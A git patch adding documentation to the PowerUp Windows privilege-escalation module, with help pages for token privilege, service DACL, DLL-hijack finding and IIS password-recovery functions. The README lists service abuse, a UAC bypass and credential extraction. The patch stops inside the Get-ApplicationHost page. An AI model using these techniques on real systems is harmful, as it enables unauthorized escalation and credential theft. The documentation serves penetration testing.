From 7964823e3f398c41a7ad1c0e8c4c28c0806a9c0d Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 11:53:29 -0500 Subject: Added documentation for PowerUp --- Privesc/PowerUp.ps1 | 190 ++++++++++----------- Privesc/Privesc.psd1 | 43 +++-- Privesc/README.md | 22 +-- docs/Privesc/Add-ServiceDacl.md | 68 ++++++++ docs/Privesc/Enable-Privilege.md | 105 ++++++++++++ docs/Privesc/Find-PathDLLHijack.md | 45 +++++ docs/Privesc/Find-ProcessDLLHijack.md | 127 ++++++++++++++ docs/Privesc/Get-ApplicationHost.md | 95 +++++++++++ docs/Privesc/Get-CachedGPPPassword.md | 55 ++++++ docs/Privesc/Get-ModifiablePath.md | 102 ++++++++++++ docs/Privesc/Get-ModifiableRegistryAutoRun.md | 44 +++++ docs/Privesc/Get-ModifiableScheduledTaskFile.md | 45 +++++ docs/Privesc/Get-ModifiableService.md | 40 +++++ docs/Privesc/Get-ModifiableServiceFile.md | 45 +++++ docs/Privesc/Get-ProcessTokenGroup.md | 114 +++++++++++++ docs/Privesc/Get-ProcessTokenPrivilege.md | 131 +++++++++++++++ docs/Privesc/Get-RegistryAlwaysInstallElevated.md | 45 +++++ docs/Privesc/Get-RegistryAutoLogon.md | 44 +++++ docs/Privesc/Get-ServiceDetail.md | 65 ++++++++ docs/Privesc/Get-SiteListPassword.md | 96 +++++++++++ docs/Privesc/Get-System.md | 172 +++++++++++++++++++ docs/Privesc/Get-UnattendedInstallFile.md | 44 +++++ docs/Privesc/Get-UnquotedService.md | 45 +++++ docs/Privesc/Get-WebConfig.md | 93 +++++++++++ docs/Privesc/Install-ServiceBinary.md | 175 +++++++++++++++++++ docs/Privesc/Invoke-PrivescAudit.md | 63 +++++++ docs/Privesc/Invoke-ServiceAbuse.md | 194 ++++++++++++++++++++++ docs/Privesc/Invoke-WScriptUACBypass.md | 85 ++++++++++ docs/Privesc/Restore-ServiceBinary.md | 87 ++++++++++ docs/Privesc/Set-ServiceBinaryPath.md | 92 ++++++++++ docs/Privesc/Test-ServiceDaclPermission.md | 112 +++++++++++++ docs/Privesc/Write-HijackDll.md | 173 +++++++++++++++++++ docs/Privesc/Write-ServiceBinary.md | 191 +++++++++++++++++++++ docs/Privesc/Write-UserAddMSI.md | 56 +++++++ docs/Privesc/index.md | 55 ++++++ docs/index.md | 1 + mkdocs.yml | 34 ++++ 37 files changed, 3067 insertions(+), 126 deletions(-) create mode 100755 docs/Privesc/Add-ServiceDacl.md create mode 100755 docs/Privesc/Enable-Privilege.md create mode 100755 docs/Privesc/Find-PathDLLHijack.md create mode 100755 docs/Privesc/Find-ProcessDLLHijack.md create mode 100755 docs/Privesc/Get-ApplicationHost.md create mode 100755 docs/Privesc/Get-CachedGPPPassword.md create mode 100755 docs/Privesc/Get-ModifiablePath.md create mode 100755 docs/Privesc/Get-ModifiableRegistryAutoRun.md create mode 100755 docs/Privesc/Get-ModifiableScheduledTaskFile.md create mode 100755 docs/Privesc/Get-ModifiableService.md create mode 100755 docs/Privesc/Get-ModifiableServiceFile.md create mode 100755 docs/Privesc/Get-ProcessTokenGroup.md create mode 100755 docs/Privesc/Get-ProcessTokenPrivilege.md create mode 100755 docs/Privesc/Get-RegistryAlwaysInstallElevated.md create mode 100755 docs/Privesc/Get-RegistryAutoLogon.md create mode 100755 docs/Privesc/Get-ServiceDetail.md create mode 100755 docs/Privesc/Get-SiteListPassword.md create mode 100755 docs/Privesc/Get-System.md create mode 100755 docs/Privesc/Get-UnattendedInstallFile.md create mode 100755 docs/Privesc/Get-UnquotedService.md create mode 100755 docs/Privesc/Get-WebConfig.md create mode 100755 docs/Privesc/Install-ServiceBinary.md create mode 100755 docs/Privesc/Invoke-PrivescAudit.md create mode 100755 docs/Privesc/Invoke-ServiceAbuse.md create mode 100755 docs/Privesc/Invoke-WScriptUACBypass.md create mode 100755 docs/Privesc/Restore-ServiceBinary.md create mode 100755 docs/Privesc/Set-ServiceBinaryPath.md create mode 100755 docs/Privesc/Test-ServiceDaclPermission.md create mode 100755 docs/Privesc/Write-HijackDll.md create mode 100755 docs/Privesc/Write-ServiceBinary.md create mode 100755 docs/Privesc/Write-UserAddMSI.md create mode 100644 docs/Privesc/index.md diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1 index 6fffef0..8ad9044 100644 --- a/Privesc/PowerUp.ps1 +++ b/Privesc/PowerUp.ps1 @@ -739,9 +739,9 @@ function Get-ModifiablePath { Parses a passed string containing multiple possible file/folder paths and returns the file paths where the current user has modification rights. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -935,9 +935,9 @@ function Get-TokenInformation { Helpers that returns token groups or privileges for a passed process/thread token. Used by Get-ProcessTokenGroup and Get-ProcessTokenPrivilege. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1065,9 +1065,9 @@ function Get-ProcessTokenGroup { Returns all SIDs that the current token context is a part of, whether they are disabled or not. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect, Get-TokenInformation +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation .DESCRIPTION @@ -1197,9 +1197,9 @@ function Get-ProcessTokenPrivilege { Returns all privileges for the current (or specified) process ID. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect, Get-TokenInformation +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation .DESCRIPTION @@ -1354,9 +1354,9 @@ function Enable-Privilege { Enables a specific privilege for the current process. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1451,9 +1451,9 @@ function Add-ServiceDacl { Adds a Dacl field to a service object returned by Get-Service. -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1567,9 +1567,9 @@ function Set-ServiceBinaryPath { Sets the binary path for a service to a specified value. -Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1688,9 +1688,9 @@ function Test-ServiceDaclPermission { Tests one or more passed services or service names against a given permission set, returning the service objects where the current user have the specified permissions. -Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: Add-ServiceDacl +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl .DESCRIPTION @@ -1868,9 +1868,9 @@ function Get-UnquotedService { Returns the name and binary path for services with unquoted paths that also have a space in the name. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission .DESCRIPTION @@ -1931,9 +1931,9 @@ function Get-ModifiableServiceFile { Enumerates all services and returns vulnerable service files. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath .DESCRIPTION @@ -1989,9 +1989,9 @@ function Get-ModifiableService { Enumerates all services and returns services for which the current user can modify the binPath. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail .DESCRIPTION @@ -2036,9 +2036,9 @@ function Get-ServiceDetail { Returns detailed information about a specified service by querying the WMI win32_service class for the specified service name. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2109,9 +2109,9 @@ function Invoke-ServiceAbuse { Abuses a function the current user has configuration rights on in order to add a local administrator or execute a custom command. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath .DESCRIPTION @@ -2346,9 +2346,9 @@ function Write-ServiceBinary { Patches in the specified command to a pre-compiled C# service executable and writes the binary out to the specified ServicePath location. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2529,9 +2529,9 @@ function Install-ServiceBinary { Replaces the service binary for the specified service with one that executes a specified command as SYSTEM. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary .DESCRIPTION @@ -2698,9 +2698,9 @@ function Restore-ServiceBinary { Restores a service binary backed up by Install-ServiceBinary. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Get-ModifiablePath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath .DESCRIPTION @@ -2793,9 +2793,9 @@ function Find-ProcessDLLHijack { Finds all DLL hijack locations for currently running processes. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2948,9 +2948,9 @@ function Find-PathDLLHijack { Finds all directories in the system %PATH% that are modifiable by the current user. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ModifiablePath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3001,9 +3001,9 @@ function Write-HijackDll { Patches in the path to a specified .bat (containing the specified command) into a pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3229,9 +3229,9 @@ function Get-RegistryAlwaysInstallElevated { Checks if any of the AlwaysInstallElevated registry keys are set. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3298,9 +3298,9 @@ function Get-RegistryAutoLogon { Finds any autologon credentials left in the registry. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3361,9 +3361,9 @@ function Get-ModifiableRegistryAutoRun { Returns any elevated system autoruns in which the current user can modify part of the path string. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3439,9 +3439,9 @@ function Get-ModifiableScheduledTaskFile { Returns scheduled tasks where the current user can modify any file in the associated task action string. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3518,9 +3518,9 @@ function Get-UnattendedInstallFile { Checks several locations for remaining unattended installation files, which may have deployment credentials. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .EXAMPLE @@ -3577,9 +3577,9 @@ function Get-WebConfig { This script will recover cleartext and encrypted connection strings from all web.config files on the system. Also, it will decrypt them if needed. -Author: Scott Sutherland, Antti Rantasaari -License: BSD 3-Clause -Required Dependencies: None +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3791,9 +3791,9 @@ function Get-ApplicationHost { Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. -Author: Scott Sutherland -License: BSD 3-Clause -Required Dependencies: None +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3952,10 +3952,10 @@ function Get-SiteListPassword { Retrieves the plaintext passwords for found McAfee's SiteList.xml files. Based on Jerome Nokin (@funoverip)'s Python solution (in links). -Author: Jerome Nokin (@funoverip) -PowerShell Port: @harmj0y -License: BSD 3-Clause -Required Dependencies: None +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4153,9 +4153,9 @@ function Get-CachedGPPPassword { Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and left in cached files on the host. -Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y -License: BSD 3-Clause -Required Dependencies: None +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4360,9 +4360,9 @@ function Write-UserAddMSI { Writes out a precompiled MSI installer that prompts for a user/group addition. This function can be used to abuse Get-RegistryAlwaysInstallElevated. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4414,9 +4414,9 @@ function Invoke-WScriptUACBypass { Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. -Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie -License: BSD 3-Clause -Required Dependencies: None +Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4650,9 +4650,9 @@ function Invoke-PrivescAudit { Executes all functions that check for various Windows privilege escalation opportunities. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4979,4 +4979,6 @@ $Advapi32 = $Types['advapi32'] $Kernel32 = $Types['kernel32'] $NTDll = $Types['ntdll'] +Set-Alias Get-CurrentUserTokenGroupSid Get-ProcessTokenGroup +Set-Alias Get-UnquotedService Get-UnquotedService Set-Alias Invoke-AllChecks Invoke-PrivescAudit diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index fb66225..6d4e3bd 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 @@ -23,37 +23,36 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = @( - 'Add-ServiceDacl', - 'Enable-Privilege', - 'Find-PathDLLHijack', - 'Find-ProcessDLLHijack', - 'Get-ApplicationHost', - 'Get-CachedGPPPassword', 'Get-ModifiablePath', - 'Get-ModifiableRegistryAutoRun', - 'Get-ModifiableScheduledTaskFile', - 'Get-ModifiableService', - 'Get-ModifiableServiceFile', 'Get-ProcessTokenGroup', 'Get-ProcessTokenPrivilege', + 'Enable-Privilege', + 'Add-ServiceDacl', + 'Set-ServiceBinaryPath', + 'Test-ServiceDaclPermission', + 'Get-UnquotedService', + 'Get-ModifiableServiceFile', + 'Get-ModifiableService', + 'Get-ServiceDetail', + 'Invoke-ServiceAbuse', + 'Write-ServiceBinary', + 'Install-ServiceBinary', + 'Restore-ServiceBinary', + 'Find-ProcessDLLHijack', + 'Find-PathDLLHijack', + 'Write-HijackDll', 'Get-RegistryAlwaysInstallElevated', 'Get-RegistryAutoLogon', - 'Get-ServiceDetail', - 'Get-SiteListPassword', - 'Get-TokenInformation', - 'Get-UnquotedService', + 'Get-ModifiableRegistryAutoRun', + 'Get-ModifiableScheduledTaskFile', 'Get-UnattendedInstallFile', 'Get-WebConfig', - 'Install-ServiceBinary', - 'Invoke-ServiceAbuse', + 'Get-ApplicationHost', + 'Get-SiteListPassword', + 'Get-CachedGPPPassword', + 'Write-UserAddMSI', 'Invoke-WScriptUACBypass', 'Invoke-PrivescAudit', - 'Restore-ServiceBinary', - 'Set-ServiceBinaryPath', - 'Test-ServiceDaclPermission', - 'Write-UserAddMSI', - 'Write-HijackDll', - 'Write-ServiceBinary', 'Get-System' ) diff --git a/Privesc/README.md b/Privesc/README.md index d5b499c..ac161d8 100644 --- a/Privesc/README.md +++ b/Privesc/README.md @@ -27,13 +27,18 @@ Required Dependencies: None Optional Dependencies: None -### Service Enumeration: - Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config Get-ModifiableService - returns services the current user can modify Get-ServiceDetail - returns detailed information about a specified service - -### Service Abuse: + Set-ServiceBinaryPath - sets the binary path for a service to a specified value Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command @@ -45,7 +50,7 @@ Optional Dependencies: None Write-HijackDll - writes out a hijackable DLL ### Registry Checks: - Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set Get-RegistryAutoLogon - checks for Autologon credentials in the registry Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns @@ -59,9 +64,6 @@ Optional Dependencies: None ### Other Helpers/Meta-Functions: Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify - Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not - Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service - Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods - Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set Write-UserAddMSI - write out a MSI installer that prompts for a user to be added - Invoke-AllChecks - runs all current escalation checks and returns a report + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/Privesc/Add-ServiceDacl.md b/docs/Privesc/Add-ServiceDacl.md new file mode 100755 index 0000000..13e4d64 --- /dev/null +++ b/docs/Privesc/Add-ServiceDacl.md @@ -0,0 +1,68 @@ +# Add-ServiceDacl + +## SYNOPSIS +Adds a Dacl field to a service object returned by Get-Service. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Add-ServiceDacl [-Name] +``` + +## DESCRIPTION +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Add-ServiceDacl +``` + +Add Dacls for every service the current user can read. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service -Name VMTools | Add-ServiceDacl +``` + +Add the Dacl to the VMTools service object. + +## PARAMETERS + +### -Name +An array of one or more service names to add a service Dacl for. +Passable on the pipeline. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Enable-Privilege.md b/docs/Privesc/Enable-Privilege.md new file mode 100755 index 0000000..6de9c43 --- /dev/null +++ b/docs/Privesc/Enable-Privilege.md @@ -0,0 +1,105 @@ +# Enable-Privilege + +## SYNOPSIS +Enables a specific privilege for the current process. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Enable-Privilege [-Privilege] +``` + +## DESCRIPTION +Uses RtlAdjustPrivilege to enable a specific privilege for the current process. +Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege +can be passed on the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +Enable-Privilege SeShutdownPrivilege + +Get-ProcessTokenPrivilege + + Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege SE_PRIVILEGE_ENABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege DISABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege DISABLED 2828 +SeIncreaseWorkingSetPrivilege DISABLED 2828 +SeTimeZonePrivilege DISABLED 2828 + + +Get-ProcessTokenPrivilege | Enable-Privilege -Verbose +VERBOSE: Attempting to enable SeShutdownPrivilege +VERBOSE: Attempting to enable SeChangeNotifyPrivilege +VERBOSE: Attempting to enable SeUndockPrivilege +VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege +VERBOSE: Attempting to enable SeTimeZonePrivilege + +Get-ProcessTokenPrivilege + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege SE_PRIVILEGE_ENABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege SE_PRIVILEGE_ENABLED 2828 +SeIncreaseWorkingSetPrivilege SE_PRIVILEGE_ENABLED 2828 +SeTimeZonePrivilege SE_PRIVILEGE_ENABLED 2828 + +## PARAMETERS + +### -Privilege +{{Fill Privilege Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Privileges + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html) + diff --git a/docs/Privesc/Find-PathDLLHijack.md b/docs/Privesc/Find-PathDLLHijack.md new file mode 100755 index 0000000..f43fc69 --- /dev/null +++ b/docs/Privesc/Find-PathDLLHijack.md @@ -0,0 +1,45 @@ +# Find-PathDLLHijack + +## SYNOPSIS +Finds all directories in the system %PATH% that are modifiable by the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Find-PathDLLHijack +``` + +## DESCRIPTION +Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath +to return the folder paths the current user can write to. +On Windows 7, if wlbsctrl.dll is +written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search +order loading. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-PathDLLHijack +``` + +Finds all %PATH% .DLL hijacking opportunities. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Path + +## NOTES + +## RELATED LINKS + +[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) + diff --git a/docs/Privesc/Find-ProcessDLLHijack.md b/docs/Privesc/Find-ProcessDLLHijack.md new file mode 100755 index 0000000..bbece58 --- /dev/null +++ b/docs/Privesc/Find-ProcessDLLHijack.md @@ -0,0 +1,127 @@ +# Find-ProcessDLLHijack + +## SYNOPSIS +Finds all DLL hijack locations for currently running processes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Find-ProcessDLLHijack [[-Name] ] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned] +``` + +## DESCRIPTION +Enumerates all currently running processes with Get-Process (or accepts an +input process object from Get-Process) and enumerates the loaded modules for each. +All loaded module name exists outside of the process binary base path, as those +are DLL load-order hijack candidates. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for all processes. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process VulnProcess | Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for the 'VulnProcess' processes. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles +``` + +Finds possible hijackable DLL locations not in C:\Windows\* and +not in C:\Program Files\* or C:\Program Files (x86)\* + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeOwned +``` + +Finds possible hijackable DLL location for processes not owned by the +current user. + +## PARAMETERS + +### -Name +The name of a process to enumerate for possible DLL path hijack opportunities. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ProcessName + +Required: False +Position: 1 +Default value: $(Get-Process | Select-Object -Expand Name) +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ExcludeWindows +Exclude paths from C:\Windows\* instead of just C:\Windows\System32\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeProgramFiles +Exclude paths from C:\Program Files\* and C:\Program Files (x86)\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeOwned +Exclude processes the current user owns. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Process + +## NOTES + +## RELATED LINKS + +[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/) + diff --git a/docs/Privesc/Get-ApplicationHost.md b/docs/Privesc/Get-ApplicationHost.md new file mode 100755 index 0000000..44d07d7 --- /dev/null +++ b/docs/Privesc/Get-ApplicationHost.md @@ -0,0 +1,95 @@ +# Get-ApplicationHost + +## SYNOPSIS +Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. + +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ApplicationHost +``` + +## DESCRIPTION +This script will decrypt and recover application pool and virtual directory passwords +from the applicationHost.config file on the system. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return application pool and virtual directory passwords from the applicationHost.config on the system. +``` + +Get-ApplicationHost + +user : PoolUser1 +pass : PoolParty1! +type : Application Pool +vdir : NA +apppool : ApplicationPool1 +user : PoolUser2 +pass : PoolParty2! +type : Application Pool +vdir : NA +apppool : ApplicationPool2 +user : VdirUser1 +pass : VdirPassword1! +type : Virtual Directory +vdir : site1/vdir1/ +apppool : NA +user : VdirUser2 +pass : VdirPassword2! +type : Virtual Directory +vdir : site2/ +apppool : NA + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-ApplicationHost | Format-Table -Autosize + +user pass type vdir apppool +---- ---- ---- ---- ------- +PoolUser1 PoolParty1! +Application Pool NA ApplicationPool1 +PoolUser2 PoolParty2! +Application Pool NA ApplicationPool2 +VdirUser1 VdirPassword1! +Virtual Directory site1/vdir1/ NA +VdirUser2 VdirPassword2! +Virtual Directory site2/ NA + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Data.DataTable + +System.Boolean + +## NOTES +Author: Scott Sutherland - 2014, NetSPI +Version: Get-ApplicationHost v1.0 